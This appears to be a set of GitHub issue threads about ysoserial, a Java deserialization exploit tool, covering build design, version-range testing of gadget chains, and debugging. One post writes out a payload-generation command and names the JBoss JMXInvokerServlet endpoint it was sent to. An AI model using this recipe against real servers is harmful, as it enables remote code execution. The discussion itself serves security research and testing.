
Pros: Simple, statically linked payload generation code
Cons: Convoluted, splintered build process

Dependency version range testing

It would be useful to have a test scaffolding (within the project or in a separate project) that can test gadget chains against multiple versions of each dependency, ideally including JRE versions. This can be useful to:

  • establish a range bracket for each dependency used by a gadget chain in which it works
  • continuously test each gadget chain against its established dependency version brackets to look for regressions
  • discover gadget class serialVersionUID incompatibilities across dependency version boundaries

https://github.com/yyuu/capistrano-jdk-installer and/or http://ftp-nyc.osuosl.org/pub/jenkins/updates/updates/hudson.tools.JDKInstaller.json may be useful for JRE version testing

ysoserial on JBoss 6.1.0.Final

I am wondering whether it works on JBoss 6.1.0.Final.
I created a payload and sent it using Burp Suite from my Kali Linux.

  • command: java -jar ysoserial-0.0.2-all.jar CommonsCollections1 'touch /tmp/test.txt' > payload
  • sent to /invoker/JMXInvokerServlet
    (change "GET" to "POST" and add the payload in the body)

But I couldn't find /tmp/test.txt on my JBoss server.
Did I do something wrong?
I need some guidance!
Thanks for reading this.

Use XStream

Has it been possible to use these methods with xstream.setMode(XStream.NO_REFERENCES) or not?
Can I adapt it to this method (XStream.NO_REFERENCES)?
I tried with Jdk7u21. It didn't work.

IncompleteAnnotationException when testing with OpenJDK 1.8.0_72

I'm getting the following stack trace when running the test cases with OpenJDK 1.8.0_72:

java.lang.Override missing element getType
java.lang.annotation.IncompleteAnnotationException: java.lang.Override missing element getType
at sun.reflect.annotation.AnnotationInvocationHandler.invoke(AnnotationInvocationHandler.java:81)
at org.springframework.core.$Proxy13.getType(Unknown Source)
at org.springframework.core.SerializableTypeWrapper$MethodInvokeTypeProvider.readObject(SerializableTypeWrapper.java:403)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1058)
at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1900)
at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1801)
at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1351)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:371)
at ysoserial.Deserializer.deserialize(Deserializer.java:27)
